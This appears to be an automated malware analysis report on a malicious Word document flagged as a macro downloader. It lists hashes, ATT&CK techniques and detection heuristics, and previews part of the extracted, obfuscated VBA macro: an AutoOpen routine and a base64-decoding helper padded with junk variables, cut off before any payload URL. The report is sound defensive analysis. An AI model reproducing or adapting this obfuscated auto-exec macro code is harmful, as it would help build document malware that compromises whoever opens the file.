Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 09c3ddcfa4423f11…

MALICIOUS

Office (OLE)

Size: 228.0 KB
Created: 2017-04-28 10:51:00
Authoring application: Microsoft Office Word
First seen: 2017-05-13
MD5: 531e879dadf5fbe5275e3c8795c50e9d
SHA-1: a977c706a418e4b4c8b16e234585f11dffad6f51
SHA-256: 09c3ddcfa4423f119ce114a416e37a2292dbd08b9c65fb5a374a650a2bcc813d
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. The macro uses a Shell() call and CreateObject, indicating an intent to execute arbitrary code. The ClamAV detection name 'Doc.Downloader.Heuristic-6312759-0' strongly suggests the macro's purpose is to download and execute a secondary payload.

Heuristics (8)

  • ClamAV: Doc.Downloader.Heuristic-6312759-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Heuristic-6312759-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 43682 bytes
SHA-256: c96ed86987223f9bcee7a9563f8eb3ef38660469a9bdd7a9f6fc46859e935077

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim wQtmLCE As Integer
wQtmLCE = Sgn(19114)
Dim bt4UoKOL As Long
bt4UoKOL = Sgn(-1109646654)
Dim BSLQW As Long
BSLQW = -897989146
Dim E1Bp6oVf0 As Long
E1Bp6oVf0 = Sgn(0)
Dim kF2Wz As Double
kF2Wz = Sgn(31893.692928932)
Dim g2gJjUB As Boolean
g2gJjUB = True
Dim S4RLE As Long
S4RLE = Sgn(-251003494)
Dim IjqHCr As Boolean
IjqHCr = False
v1yZLu4F
End Sub

Attribute VB_Name = "Module2"
Function khQdv(ByVal R20KqY)

Dim BRycYj As Boolean
BRycYj = True
Dim W0HEn As Boolean
W0HEn = True
Dim qDFl15W As Single
qDFl15W = Round(46273.527060298)
Dim Amqwh As Long
Amqwh = Sgn(0)
Dim wyw6sZp As Double
wyw6sZp = 28853.284192116
Dim E5wWX As Single
E5wWX = Sgn(32638.632937161)
Dim UQnws6R As Double
UQnws6R = 45499.918604462
Dim wTADjst As Integer
wTADjst = Sgn(-22571)
Dim Wbp2itDAK
Dim xb2g5Wk
Dim wAesRQpVO As String
wAesRQpVO = UCase(JgcahNL)
Dim BapmLs1j As Boolean
BapmLs1j = False
Dim RSkIBCf As Long
RSkIBCf = -981375342
Dim LlRqK5rv As Boolean
LlRqK5rv = False
Dim yrCWc As String
yrCWc = Len(ArhEYqX)
Dim yTmbke As Long
yTmbke = Sgn(-1856659486)
Dim F1xt2qZ0 As Single
F1xt2qZ0 = 44625.158338517
Dim ggiTsPQA As Integer
ggiTsPQA = 18239
Dim wdV6XzRZ0 As Boolean
wdV6XzRZ0 = False
Dim ExE3ni9 As Single
ExE3ni9 = Int(51620.539091208)
Dim aDecFOs As Byte
aDecFOs = 134
Dim xCeP4 As Single
xCeP4 = Sgn(42071.086951005)
Dim ynlpA2Y As Boolean
ynlpA2Y = True
Dim z7Hf2y As Single
z7Hf2y = Sgn(13633.552026243)
Dim GBytW
GBytW = Asc("E")
Dim UdjaXb7rJ As Double
UdjaXb7rJ = 50349.000628173
Dim PSLd3s As Single
PSLd3s = Fix(20992.035646674)

Dim jnJxK5 As Double
jnJxK5 = 4126.1778889158
Dim xgilALC8 As Long
xgilALC8 = Sgn(0)
Dim p9WRbrF1 As Boolean
p9WRbrF1 = False
Dim DVcrlNA30 As Double
DVcrlNA30 = Sgn(9859.2153510131)
Dim KfOBb As Boolean
KfOBb = False
Dim DQxWzK1AP As Integer
DQxWzK1AP = -17888
Dim wO85Hqjwd As Integer
wO85Hqjwd = -32373
Dim Ea7Pwgldn
Ea7Pwgldn = Val(NvwFd3)
Dim oMx7A6c0l As Long
oMx7A6c0l = -1182213244
Dim L8xQFns As Boolean
L8xQFns = False
Dim viEkx0 As Single
viEkx0 = 22073.298626593
Dim AL6D87 As Boolean
AL6D87 = True
Dim CNxrL4n As Long
CNxrL4n = -211193930
Dim fG7dXVE As Long
fG7dXVE = 0
Set Wbp2itDAK = CreateObject("msxml2.domdocument")
Dim rFDQ9L As Long
rFDQ9L = Sgn(-1709018872)
Dim Nq1gF0eG As String
Nq1gF0eG = Val("&")
Dim xCMZzt As Boolean
xCMZzt = True
Dim XxXqtmckp As Byte
XxXqtmckp = 147
Dim J6hxgVDy As Byte
J6hxgVDy = 205
Dim Hpi2zd0xX As Double
Hpi2zd0xX = Int(15780.778689087)
Dim WiQnEW As Integer
WiQnEW = Sgn(32379)
Dim Y7lSMg0 As Single
Y7lSMg0 = Fix(44984.000010176)
Dim PkbTtBLUl As Integer
PkbTtBLUl = -9512
Dim natiJlYr5
natiJlYr5 = Val(J27Vjn)
Dim BAVecrvI As Double
BAVecrvI = 13114.320768791
Set xb2g5Wk = Wbp2itDAK.CreateElement("base64")
Dim xMiAuy As Integer
xMiAuy = Sgn(2272)
Dim oFtlbWP9K As Integer
oFtlbWP9K = Sgn(24597)
Dim SYgo4BD As Boolean
SYgo4BD = False
Dim NI2OVyAz6 As Long
NI2OVyAz6 = Sgn(-1863322718)
Dim Bzd9FK3kq As Boolean
Bzd9FK3kq = False
Dim oz6LGPfZ As Single
oz6LGPfZ = 62635.46753633
Dim GRjHel1B As Single
GRjHel1B = Sgn(8152.7284043682)
Dim NG5aUSn9H
NG5aUSn9H = LCase(xQkfsL7Uw)
Dim Jy7NCHkY As Integer
Jy7NCHkY = Sgn(-16617)
Dim Tiz1FpUd As Single
Tiz1FpUd = Sgn(31589.963119238)
Dim RDq6spk As Long
RDq6spk = Sgn(-485500268)
Dim kxaVMi As Single
kxaVMi = Fix(48475.968916053)
Dim FJd4nKHW As Single
FJd4nKHW = Val(17625.110795628)
Dim LBgQK4xEo As Byte
LBgQK4xEo = 0
Dim SY42a As Single
SY42a = Round(40109.773929756)
Dim lkfONUbr As Boolean
lkfONUbr = False
Dim ZeDJx As Byte
ZeDJx = 190
Dim JQV5H As Byte
JQV5H = 126
xb2g5Wk.dataType = "bin.base64"
Dim GXsc3Jv
GXsc3Jv = AscW("+")
Dim LGJSU As Byte
L
... (truncated)